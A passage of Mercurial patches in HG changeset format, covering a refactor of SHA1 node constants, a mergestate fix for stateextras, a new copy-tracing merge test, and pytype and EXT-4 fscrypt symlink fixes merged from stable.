predecessors # None is used when no data has been recorded - def __init__(self, svfs, defaultformat=_fm1version, readonly=False): + def __init__(self, repo, svfs, defaultformat=_fm1version, readonly=False): # caches for various obsolescence related cache self.caches = {} self.svfs = svfs + self.repo = repo self._defaultformat = defaultformat self._readonly = readonly @@ -806,7 +807,7 @@ if defaultformat is not None: kwargs['defaultformat'] = defaultformat readonly = not isenabled(repo, createmarkersopt) - store = obsstore(repo.svfs, readonly=readonly, **kwargs) + store = obsstore(repo, repo.svfs, readonly=readonly, **kwargs) if store and readonly: ui.warn( _(b'obsolete feature not enabled but %i markers found!\n') diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -28,6 +28,7 @@ nullhex, nullid, nullrev, + sha1nodeconstants, short, wdirfilenodeids, wdirhex, @@ -651,6 +652,10 @@ raise error.RevlogError( _(b'unknown version (%d) in revlog %s') % (fmt, self.indexfile) ) + + self.nodeconstants = sha1nodeconstants + self.nullid = self.nodeconstants.nullid + # sparse-revlog can't be on without general-delta (issue6056) if not self._generaldelta: self._sparserevlog = False diff --git a/mercurial/statichttprepo.py b/mercurial/statichttprepo.py --- a/mercurial/statichttprepo.py +++ b/mercurial/statichttprepo.py @@ -12,6 +12,7 @@ import errno from .i18n import _ +from .node import sha1nodeconstants from . import ( branchmap, changelog, @@ -198,6 +199,8 @@ requirements, supportedrequirements ) localrepo.ensurerequirementscompatible(ui, requirements) + self.nodeconstants = sha1nodeconstants + self.nullid = self.nodeconstants.nullid # setup store self.store = localrepo.makestore(requirements, self.path, vfsclass) @@ -207,7 +210,7 @@ self._filecache = {} self.requirements = requirements - rootmanifest = manifest.manifestrevlog(self.svfs) + rootmanifest = manifest.manifestrevlog(self.nodeconstants, self.svfs) self.manifestlog = manifest.manifestlog( self.svfs, self, rootmanifest, self.narrowmatch() ) diff --git a/mercurial/store.py b/mercurial/store.py --- a/mercurial/store.py +++ b/mercurial/store.py @@ -441,7 +441,7 @@ ) def manifestlog(self, repo, storenarrowmatch): - rootstore = manifest.manifestrevlog(self.vfs) + rootstore = manifest.manifestrevlog(repo.nodeconstants, self.vfs) return manifest.manifestlog(self.vfs, repo, rootstore, storenarrowmatch) def datafiles(self, matcher=None): diff --git a/mercurial/unionrepo.py b/mercurial/unionrepo.py --- a/mercurial/unionrepo.py +++ b/mercurial/unionrepo.py @@ -153,9 +153,9 @@ class unionmanifest(unionrevlog, manifest.manifestrevlog): - def __init__(self, opener, opener2, linkmapper): - manifest.manifestrevlog.__init__(self, opener) - manifest2 = manifest.manifestrevlog(opener2) + def __init__(self, nodeconstants, opener, opener2, linkmapper): + manifest.manifestrevlog.__init__(self, nodeconstants, opener) + manifest2 = manifest.manifestrevlog(nodeconstants, opener2) unionrevlog.__init__( self, opener, self.indexfile, manifest2, linkmapper ) @@ -205,7 +205,10 @@ @localrepo.unfilteredpropertycache def manifestlog(self): rootstore = unionmanifest( - self.svfs, self.repo2.svfs, self.unfiltered()._clrev + self.nodeconstants, + self.svfs, + self.repo2.svfs, + self.unfiltered()._clrev, ) return manifest.manifestlog( self.svfs, self, rootstore, self.narrowmatch() diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -36,7 +36,9 @@ return changelog.changelog(repo.svfs) elif path.endswith(b'00manifest.i'): mandir = path[: -len(b'00manifest.i')] - return manifest.manifestrevlog(repo.svfs, tree=mandir) + return manifest.manifestrevlog( + repo.nodeconstants, repo.svfs, tree=mandir + ) else: # reverse of "/".join(("data", path + ".i")) return filelog.filelog(repo.svfs, path[5:-2]) diff --git a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -43,3 +43,7 @@ now get a revision number as argument instead of a node. * revlog.addrevision returns the revision number instead of the node. + + * `nodes.nullid` and related constants are being phased out as part of + the deprecation of SHA1. Repository instances and related classes + provide access via `nodeconstants` and in some cases `nullid` attributes. diff --git a/tests/simplestorerepo.py b/tests/simplestorerepo.py --- a/tests/simplestorerepo.py +++ b/tests/simplestorerepo.py @@ -106,7 +106,9 @@ _flagserrorclass = simplestoreerror - def __init__(self, svfs, path): + def __init__(self, repo, svfs, path): + self.nullid = repo.nullid + self._repo = repo self._svfs = svfs self._path = path @@ -689,7 +691,7 @@ class simplestorerepo(repo.__class__): def file(self, f): - return filestorage(self.svfs, f) + return filestorage(repo, self.svfs, f) repo.__class__ = simplestorerepo diff --git a/tests/test-check-interfaces.py b/tests/test-check-interfaces.py --- a/tests/test-check-interfaces.py +++ b/tests/test-check-interfaces.py @@ -248,7 +248,10 @@ # Conforms to imanifestlog. ml = manifest.manifestlog( - vfs, repo, manifest.manifestrevlog(repo.svfs), repo.narrowmatch() + vfs, + repo, + manifest.manifestrevlog(repo.nodeconstants, repo.svfs), + repo.narrowmatch(), ) checkzobject(ml) checkzobject(repo.manifestlog) @@ -263,7 +266,7 @@ # Conforms to imanifestdict. checkzobject(mctx.read()) - mrl = manifest.manifestrevlog(vfs) + mrl = manifest.manifestrevlog(repo.nodeconstants, vfs) checkzobject(mrl) ziverify.verifyClass(repository.irevisiondelta, revlog.revlogrevisiondelta) diff --git a/tests/test-manifest.py b/tests/test-manifest.py --- a/tests/test-manifest.py +++ b/tests/test-manifest.py @@ -6,6 +6,8 @@ import unittest import zlib +from mercurial.node import sha1nodeconstants + from mercurial import ( manifest as manifestmod, match as matchmod, @@ -436,7 +438,7 @@ class testtreemanifest(unittest.TestCase, basemanifesttests): def parsemanifest(self, text): - return manifestmod.treemanifest(b'', text) + return manifestmod.treemanifest(sha1nodeconstants, b'', text) def testWalkSubtrees(self): m = self.parsemanifest(A_DEEPER_MANIFEST) # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1615361921 -19800 # Wed Mar 10 13:08:41 2021 +0530 # Node ID 1099ca176ba1914297eb49a06832fac853c3dfa0 # Parent 6266d19556ad186f81caf3e892148a993428c407 mergestate: don't pop stateextras when there are no conflicts on filemerge Even if `filemerge.filemerge()` didn't result in conflicts, we should not remove stateextras for a file since we now use that for more things than just merge time information. We use stateextras to store information which is required to be used by commit. I tracked this down while finding why a patch of mine which adds more commit related information does not work as expected and looses the extras in mergestate. Differential Revision: https://phab.mercurial-scm.org/D10148 diff --git a/mercurial/mergestate.py b/mercurial/mergestate.py --- a/mercurial/mergestate.py +++ b/mercurial/mergestate.py @@ -382,7 +382,6 @@ if merge_ret is None: # If return value of merge is None, then there are no real conflict del self._state[dfile] - self._stateextras.pop(dfile, None) self._dirty = True elif not merge_ret: self.mark(dfile, MERGE_RECORD_RESOLVED) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1614639922 -3600 # Tue Mar 02 00:05:22 2021 +0100 # Node ID 6b52cffd8d0a266f50935d1a64feddba279d3a9e # Parent 1099ca176ba1914297eb49a06832fac853c3dfa0 test-copies: add a test updating file content while merging a pure overwrite As the current test misbehavior show, this confuse various part of the code: - the committed file is different depending of the commit source, - the upgrade code compute the wrong information on this changeset. This will be fixed in upcoming patches. Differential Revision: https://phab.mercurial-scm.org/D10087 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -891,6 +891,105 @@ o i-0 initial commit: a b h p q r +Subcase: merge overwrite common copy information, but with extra change during the merge +```````````````````````````````````````````````````````````````````````````````````````` + +Merge: +- one with change to an unrelated file (b) +- one overwriting a file (d) with a rename (from h to i to d) +- the merge update f content + + $ case_desc="merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d)" + + $ hg up 'desc("f-2")' + 2 files updated, 0 files merged, 2 files removed, 0 files unresolved +#if no-changeset + $ hg debugindex d | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * d8252ab2e760 000000000000 000000000000 + 1 * b004912a8510 000000000000 000000000000 + 2 * 7b79e2fe0c89 000000000000 000000000000 + 3 * 17ec97e60577 d8252ab2e760 000000000000 + 4 * 06dabf50734c b004912a8510 17ec97e60577 + 5 * 19c0e3924691 17ec97e60577 b004912a8510 + 6 * 89c873a01d97 7b79e2fe0c89 17ec97e60577 + 7 * d55cb4e9ef57 000000000000 000000000000 +#else + $ hg debugindex d | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * ae258f702dfe 000000000000 000000000000 + 1 * b004912a8510 000000000000 000000000000 + 2 * 5cce88bf349f ae258f702dfe 000000000000 + 3 * cc269dd788c8 b004912a8510 5cce88bf349f + 4 * 51c91a115080 5cce88bf349f b004912a8510 +#endif + $ hg up 'desc("b-1")' + 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + $ hg merge 'desc("f-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) + (branch merge, don't forget to commit) + $ echo "extra-change to (formelly h) during the merge" > d + $ hg ci -m "mBF-change-m-0 $case_desc - one way" + created new head + $ hg manifest --rev . --debug | grep " d" + 1c334238bd42ec85c6a0d83fd1b2a898a6a3215d 644 d (no-changeset !) + cea2d99c0fde64672ef61953786fdff34f16e230 644 d (changeset !) + + $ hg up 'desc("f-2")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("b-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ echo "extra-change to (formelly h) during the merge" > d + $ hg ci -m "mFB-change-m-0 $case_desc - the other way" + created new head + $ hg manifest --rev . --debug | grep " d" + 1c334238bd42ec85c6a0d83fd1b2a898a6a3215d 644 d (no-changeset missing-correct-output !) + 646ed7992dec41eb29635ab28268e7867d0e59a0 644 d (no-changeset known-bad-output !) + cea2d99c0fde64672ef61953786fdff34f16e230 644 d (changeset !) +#if no-changeset + $ hg debugindex d | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * d8252ab2e760 000000000000 000000000000 + 1 * b004912a8510 000000000000 000000000000 + 2 * 7b79e2fe0c89 000000000000 000000000000 + 3 * 17ec97e60577 d8252ab2e760 000000000000 + 4 * 06dabf50734c b004912a8510 17ec97e60577 + 5 * 19c0e3924691 17ec97e60577 b004912a8510 + 6 * 89c873a01d97 7b79e2fe0c89 17ec97e60577 + 7 * d55cb4e9ef57 000000000000 000000000000 + 8 * 1c334238bd42 7b79e2fe0c89 000000000000 + 9 * 646ed7992dec 7b79e2fe0c89 d8252ab2e760 (known-bad-output !) +#else + $ hg debugindex d | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * ae258f702dfe 000000000000 000000000000 + 1 * b004912a8510 000000000000 000000000000 + 2 * 5cce88bf349f ae258f702dfe 000000000000 + 3 * cc269dd788c8 b004912a8510 5cce88bf349f + 4 * 51c91a115080 5cce88bf349f b004912a8510 + 5 * cea2d99c0fde ae258f702dfe 000000000000 +#endif + $ hg log -G --rev '::(desc("mBF-change-m")+desc("mFB-change-m"))' + @ mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + |\ + +---o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + | |/ + | o f-2: rename i -> d + | | + | o f-1: rename h -> i + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + Decision from previous merge are properly chained with later merge ------------------------------------------------------------------ @@ -907,7 +1006,7 @@ (extra unrelated changes) $ hg up 'desc("a-2")' - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ echo j > unrelated-j $ hg add unrelated-j $ hg ci -m 'j-1: unrelated changes (based on the "a" series of changes)' @@ -1396,6 +1495,7 @@ mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way mBCm-1 re-add d mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way + mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way mBRm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - one way mCB+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) @@ -1410,6 +1510,7 @@ mEA-change,Jm: chained merges (conflict+change -> simple) - same content on both branch in the initial merge mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way + mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way mFG,Om: chained merges (copy-overwrite -> simple) - same content mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way @@ -1800,6 +1901,26 @@ entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f' merged : f, ; + ##### revision "mBF-change-m-0 merge with extra change - B side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' (no-upgraded no-upgraded-parallel !) + touched : d, ; (no-upgraded no-upgraded-parallel !) + '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded missing-correct-output !) + touched : d, ; (upgraded missing-correct-output !) + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded known-bad-output !) + merged : d, ; (upgraded known-bad-output !) + '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel missing-correct-output !) + touched : d, ; (upgraded-parallel missing-correct-output !) + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel known-bad-output !) + merged : d, ; (upgraded-parallel known-bad-output !) + ##### revision "mFB-change-m-0 merge with extra change - B side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (known-bad-output !) + merged : d, ; (known-bad-output !) + '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' (missing-correct-output !) + touched : d, ; (missing-correct-output !) ##### revision "j-1" ##### 1 sidedata entries entry-0014 size 24 @@ -3193,6 +3314,131 @@ R p +Subcase: merge overwrite common copy information, but with extra change during the merge +``````````````````````````````````````````````````````````````````````````````````` + +Merge: +- one with change to an unrelated file (b) +- one overwriting a file (d) with a rename (from h to i to d) + + $ hg log -G --rev '::(desc("mBF-change-m")+desc("mFB-change-m"))' + o mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + |\ + +---o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + | |/ + | o f-2: rename i -> d + | | + | o f-1: rename h -> i + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBF-change-m-0")' + M b + A d + h (filelog !) + h (sidedata !) + a (upgraded known-bad-output !) + h (upgraded missing-correct-output !) + a (upgraded-parallel known-bad-output !) + h (upgraded-parallel missing-correct-output !) + h (changeset !) + h (compatibility !) + A t + p + R a + R h + R p + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFB-change-m-0")' + M b + A d + h (filelog missing-correct-output !) + a (filelog known-bad-output !) + h (sidedata !) + h (upgraded !) + h (upgraded-parallel !) + h (changeset !) + h (compatibility !) + A t + p + R a + R h + R p + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBF-change-m-0")' + M d + h (no-filelog !) + R h + $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mBF-change-m-0")' + M b + M d + $ hg status --copies --rev 'desc("f-1")' --rev 'desc("mBF-change-m-0")' + M b + M d + i (no-filelog !) + R i + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mFB-change-m-0")' + M d + h (no-filelog !) + R h + $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mFB-change-m-0")' + M b + M d + $ hg status --copies --rev 'desc("f-1")' --rev 'desc("mFB-change-m-0")' + M b + M d + i (no-filelog !) + R i + +#if no-changeset + $ hg log -Gfr 'desc("mBF-change-m-0")' d + o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + |\ + o : f-2: rename i -> d + | : + o : f-1: rename h -> i + :/ + o i-0 initial commit: a b h p q r + +#else +BROKEN: `hg log --follow <file>` relies on filelog metadata to work + $ hg log -Gfr 'desc("mBF-change-m-0")' d + o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + : + o i-2: c -move-> d, s -move-> t + | + ~ +#endif + +#if no-changeset + $ hg log -Gfr 'desc("mFB-change-m-0")' d + o mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + |\ + o : f-2: rename i -> d + | : + o : f-1: rename h -> i + :/ + o i-2: c -move-> d, s -move-> t (known-bad-output !) + | (known-bad-output !) + o i-1: a -move-> c, p -move-> s (known-bad-output !) + | (known-bad-output !) + o i-0 initial commit: a b h p q r + +#else +BROKEN: `hg log --follow <file>` relies on filelog metadata to work + $ hg log -Gfr 'desc("mFB-change-m-0")' d + o mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + : + o i-2: c -move-> d, s -move-> t + | + ~ +#endif + + Decision from previous merge are properly chained with later merge ------------------------------------------------------------------ # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1616106299 14400 # Thu Mar 18 18:24:59 2021 -0400 # Node ID e2f7b2695ba153eb7c03b93e3d6a70ac0c82fb59 # Parent 6b52cffd8d0a266f50935d1a64feddba279d3a9e # Parent 86b47ec1960abd22143665bcd84f5d28390f70aa merge with stable diff --git a/mercurial/branchmap.py b/mercurial/branchmap.py --- a/mercurial/branchmap.py +++ b/mercurial/branchmap.py @@ -39,6 +39,7 @@ Tuple, Union, ) + from . import localrepo assert any( ( @@ -51,6 +52,7 @@ Set, Tuple, Union, + localrepo, ) ) @@ -193,7 +195,7 @@ closednodes=None, hasnode=None, ): - # type: (Union[Dict[bytes, List[bytes]], Iterable[Tuple[bytes, List[bytes]]]], bytes, int, Optional[bytes], Optional[Set[bytes]], Optional[Callable[[bytes], bool]]) -> None + # type: (localrepo.localrepository, Union[Dict[bytes, List[bytes]], Iterable[Tuple[bytes, List[bytes]]]], bytes, int, Optional[bytes], Optional[Set[bytes]], Optional[Callable[[bytes], bool]]) -> None """hasnode is a function which can be used to verify whether changelog has a given node or not. If it's not provided, we assume that every node we have exists in changelog""" @@ -303,9 +305,7 @@ msg % ( _branchcachedesc(repo), - pycompat.bytestr( - inst - ), # pytype: disable=wrong-arg-types + stringutil.forcebytestr(inst), ) ) bcache = None diff --git a/mercurial/cffi/bdiff.py b/mercurial/cffi/bdiff.py --- a/mercurial/cffi/bdiff.py +++ b/mercurial/cffi/bdiff.py @@ -10,7 +10,7 @@ import struct from ..pure.bdiff import * -from . import _bdiff +from . import _bdiff # pytype: disable=import-error ffi = _bdiff.ffi lib = _bdiff.lib diff --git a/mercurial/cffi/mpatch.py b/mercurial/cffi/mpatch.py --- a/mercurial/cffi/mpatch.py +++ b/mercurial/cffi/mpatch.py @@ -9,7 +9,7 @@ from ..pure.mpatch import * from ..pure.mpatch import mpatchError # silence pyflakes -from . import _mpatch +from . import _mpatch # pytype: disable=import-error ffi = _mpatch.ffi lib = _mpatch.lib diff --git a/mercurial/cffi/osutil.py b/mercurial/cffi/osutil.py --- a/mercurial/cffi/osutil.py +++ b/mercurial/cffi/osutil.py @@ -15,7 +15,7 @@ from .. import pycompat if pycompat.isdarwin: - from . import _osutil + from . import _osutil # pytype: disable=import-error ffi = _osutil.ffi lib = _osutil.lib diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -910,7 +910,7 @@ configtarget = repo.ui.config(b'devel', b'bundle.delta') if configtarget not in (b'', b'p1', b'full'): - msg = _("""config "devel.bundle.delta" as unknown value: %s""") + msg = _(b"""config "devel.bundle.delta" as unknown value: %s""") repo.ui.warn(msg % configtarget) deltamode = repository.CG_DELTAMODE_STD @@ -1311,9 +1311,10 @@ def makelookupmflinknode(tree, nodes): if fastpathlinkrev: assert not tree - return ( - manifests.__getitem__ - ) # pytype: disable=unsupported-operands + + # pytype: disable=unsupported-operands + return manifests.__getitem__ + # pytype: enable=unsupported-operands def lookupmflinknode(x): """Callback for looking up the linknode for manifests. diff --git a/mercurial/cmdutil.py b/mercurial/cmdutil.py --- a/mercurial/cmdutil.py +++ b/mercurial/cmdutil.py @@ -869,7 +869,7 @@ ) msg = ( _( - '''Unresolved merge conflicts: + b'''Unresolved merge conflicts: %s diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -1083,7 +1083,7 @@ if rev: if not nodes: raise error.Abort(_(b'empty revision set')) - node = repo[nodes.last()].node() + node = repo[nodes[-1]].node() with hbisect.restore_state(repo, state, node): while changesets: # update state @@ -3452,7 +3452,8 @@ regexp = util.re.compile(pattern, reflags) except re.error as inst: ui.warn( - _(b"grep: invalid match pattern: %s\n") % pycompat.bytestr(inst) + _(b"grep: invalid match pattern: %s\n") + % stringutil.forcebytestr(inst) ) return 1 sep, eol = b':', b'\n' diff --git a/mercurial/commit.py b/mercurial/commit.py --- a/mercurial/commit.py +++ b/mercurial/commit.py @@ -359,19 +359,15 @@ elif fparent1 == nullid: fparent1, fparent2 = fparent2, nullid elif fparent2 != nullid: - # is one parent an ancestor of the other? - fparentancestors = flog.commonancestorsheads(fparent1, fparent2) - if fparent1 in fparentancestors: + if ms.active() and ms.extras(fname).get(b'filenode-source') == b'other': fparent1, fparent2 = fparent2, nullid - elif fparent2 in fparentancestors: - fparent2 = nullid - elif not fparentancestors: - # TODO: this whole if-else might be simplified much more - if ( - ms.active() - and ms.extras(fname).get(b'filenode-source') == b'other' - ): + # is one parent an ancestor of the other? + else: + fparentancestors = flog.commonancestorsheads(fparent1, fparent2) + if fparent1 in fparentancestors: fparent1, fparent2 = fparent2, nullid + elif fparent2 in fparentancestors: + fparent2 = nullid force_new_node = False # The file might have been deleted by merge code and user explicitly choose diff --git a/mercurial/context.py b/mercurial/context.py --- a/mercurial/context.py +++ b/mercurial/context.py @@ -993,8 +993,10 @@ # if file data starts with '\1\n', empty metadata block is # prepended, which adds 4 bytes to filelog.size(). return self._filelog.cmp(self._filenode, fctx.data()) - if self.size() == fctx.size(): + if self.size() == fctx.size() or self.flags() == b'l': # size() matches: need to compare content + # issue6456: Always compare symlinks because size can represent + # encrypted string for EXT-4 encryption(fscrypt). return self._filelog.cmp(self._filenode, fctx.data()) # size() differs diff --git a/mercurial/crecord.py b/mercurial/crecord.py --- a/mercurial/crecord.py +++ b/mercurial/crecord.py @@ -34,14 +34,14 @@ # patch comments based on the git one diffhelptext = _( - """# To remove '-' lines, make them ' ' lines (context). + b"""# To remove '-' lines, make them ' ' lines (context). # To remove '+' lines, delete them. # Lines starting with # will be removed from the patch. """ ) hunkhelptext = _( - """# + b"""# # If the patch applies cleanly, the edited hunk will immediately be # added to the record list. If it does not apply cleanly, a rejects file # will be generated. You can use that when you try again. If all lines @@ -51,7 +51,7 @@ ) patchhelptext = _( - """# + b"""# # If the patch applies cleanly, the edited patch will immediately # be finalised. If it does not apply cleanly, rejects files will be # generated. You can use those when you try again. @@ -64,7 +64,7 @@ curses.error except (ImportError, AttributeError): - curses = False + curses = None class fallbackerror(error.Abort): @@ -611,7 +611,8 @@ chunkselector.stdscr = dummystdscr() if testfn and os.path.exists(testfn): - testf = open(testfn, 'r') + testf = open(testfn, b'r') + # TODO: open in binary mode? testcommands = [x.rstrip('\n') for x in testf.readlines()] testf.close() while True: @@ -1151,7 +1152,7 @@ numtrailingspaces = origlen - strippedlen if towin: - window.addstr(text, colorpair) + window.addstr(encoding.strfromlocal(text), colorpair) t += text if showwhtspc: @@ -1621,7 +1622,7 @@ def helpwindow(self): """print a help window to the screen. exit after any keypress.""" helptext = _( - """ [press any key to return to the patch-display] + b""" [press any key to return to the patch-display] The curses hunk selector allows you to interactively choose among the changes you have made, and confirm only those changes you select for @@ -1745,7 +1746,7 @@ """ask for 'y' to be pressed to confirm selected. return True if confirmed.""" confirmtext = _( - """If you answer yes to the following, your currently chosen patch chunks + b"""If you answer yes to the following, your currently chosen patch chunks will be loaded into an editor. To modify the patch, make the changes in your editor and save. To accept the current patch as-is, close the editor without saving. diff --git a/mercurial/dagparser.py b/mercurial/dagparser.py --- a/mercurial/dagparser.py +++ b/mercurial/dagparser.py @@ -168,9 +168,9 @@ if not desc: return - wordchars = pycompat.bytestr( - string.ascii_letters + string.digits - ) # pytype: disable=wrong-arg-types + # pytype: disable=wrong-arg-types + wordchars = pycompat.bytestr(string.ascii_letters + string.digits) + # pytype: enable=wrong-arg-types labels = {} p1 = -1 @@ -179,9 +179,9 @@ def resolve(ref): if not ref: return p1 - elif ref[0] in pycompat.bytestr( - string.digits - ): # pytype: disable=wrong-arg-types + # pytype: disable=wrong-arg-types + elif ref[0] in pycompat.bytestr(string.digits): + # pytype: enable=wrong-arg-types return r - int(ref) else: return labels[ref] @@ -215,9 +215,9 @@ c = nextch() while c != b'\0': - while c in pycompat.bytestr( - string.whitespace - ): # pytype: disable=wrong-arg-types + # pytype: disable=wrong-arg-types + while c in pycompat.bytestr(string.whitespace): + # pytype: enable=wrong-arg-types c = nextch() if c == b'.': yield b'n', (r, [p1]) @@ -225,9 +225,9 @@ r += 1 c = nextch() elif c == b'+': - c, digs = nextrun( - nextch(), pycompat.bytestr(string.digits) - ) # pytype: disable=wrong-arg-types + # pytype: disable=wrong-arg-types + c, digs = nextrun(nextch(), pycompat.bytestr(string.digits)) + # pytype: enable=wrong-arg-types n = int(digs) for i in pycompat.xrange(0, n): yield b'n', (r, [p1]) diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -1702,7 +1702,7 @@ ) try: - from . import rustext + from . import rustext # pytype: disable=import-error rustext.__doc__ # trigger lazy import except ImportError: @@ -2121,7 +2121,9 @@ try: manifest = m[store.lookup(n)] except error.LookupError as e: - raise error.Abort(e, hint=b"Check your manifest node id") + raise error.Abort( + bytes(e), hint=b"Check your manifest node id" + ) manifest.read() # stores revisision in cache too return @@ -2456,7 +2458,7 @@ tr.close() except ValueError as exc: raise error.Abort( - _(b'bad obsmarker input: %s') % pycompat.bytestr(exc) + _(b'bad obsmarker input: %s') % stringutil.forcebytestr(exc) ) finally: tr.release() diff --git a/mercurial/dirstate.py b/mercurial/dirstate.py --- a/mercurial/dirstate.py +++ b/mercurial/dirstate.py @@ -1284,7 +1284,12 @@ or size == -2 # other parent or fn in copymap ): - madd(fn) + if stat.S_ISLNK(st.st_mode) and size != st.st_size: + # issue6456: Size returned may be longer due to + # encryption on EXT-4 fscrypt, undecided. + ladd(fn) + else: + madd(fn) elif ( time != st[stat.ST_MTIME] and time != st[stat.ST_MTIME] & _rangemask diff --git a/mercurial/dispatch.py b/mercurial/dispatch.py --- a/mercurial/dispatch.py +++ b/mercurial/dispatch.py @@ -173,7 +173,9 @@ "line_buffering": sys.stdout.line_buffering, } if util.safehasattr(sys.stdout, "write_through"): + # pytype: disable=attribute-error kwargs["write_through"] = sys.stdout.write_through + # pytype: enable=attribute-error sys.stdout = io.TextIOWrapper( sys.stdout.buffer, sys.stdout.encoding, @@ -187,7 +189,9 @@ "line_buffering": sys.stderr.line_buffering, } if util.safehasattr(sys.stderr, "write_through"): + # pytype: disable=attribute-error kwargs["write_through"] = sys.stderr.write_through + # pytype: enable=attribute-error sys.stderr = io.TextIOWrapper( sys.stderr.buffer, sys.stderr.encoding, diff --git a/mercurial/error.py b/mercurial/error.py --- a/mercurial/error.py +++ b/mercurial/error.py @@ -18,6 +18,11 @@ # Do not import anything but pycompat here, please from . import pycompat +if pycompat.TYPE_CHECKING: + from typing import ( + Optional, + ) + def _tobytes(exc): """Byte-stringify exception in the same way as BaseException_str()""" @@ -170,6 +175,7 @@ """Raised if a command needs to print an error and exit.""" def __init__(self, message, hint=None): + # type: (bytes, Optional[bytes]) -> None self.message = message self.hint = hint # Pass the message into the Exception constructor to help extensions diff --git a/mercurial/extensions.py b/mercurial/extensions.py --- a/mercurial/extensions.py +++ b/mercurial/extensions.py @@ -912,6 +912,7 @@ exts = {} for ename, ext in extensions(): doc = gettext(ext.__doc__) or _(b'(no help text available)') + assert doc is not None # help pytype if shortname: ename = ename.split(b'.')[-1] exts[ename] = doc.splitlines()[0].strip() diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -41,7 +41,6 @@ mergestate as mergestatemod, narrowspec, phases, - pycompat, requirements, scmutil, sshpeer, @@ -53,7 +52,11 @@ verify as verifymod, vfs as vfsmod, ) -from .utils import hashutil +from .utils import ( + hashutil, + stringutil, +) + release = lock.release @@ -74,7 +77,7 @@ # Python 2 raises TypeError, Python 3 ValueError. except (TypeError, ValueError) as e: raise error.Abort( - _(b'invalid path %s: %s') % 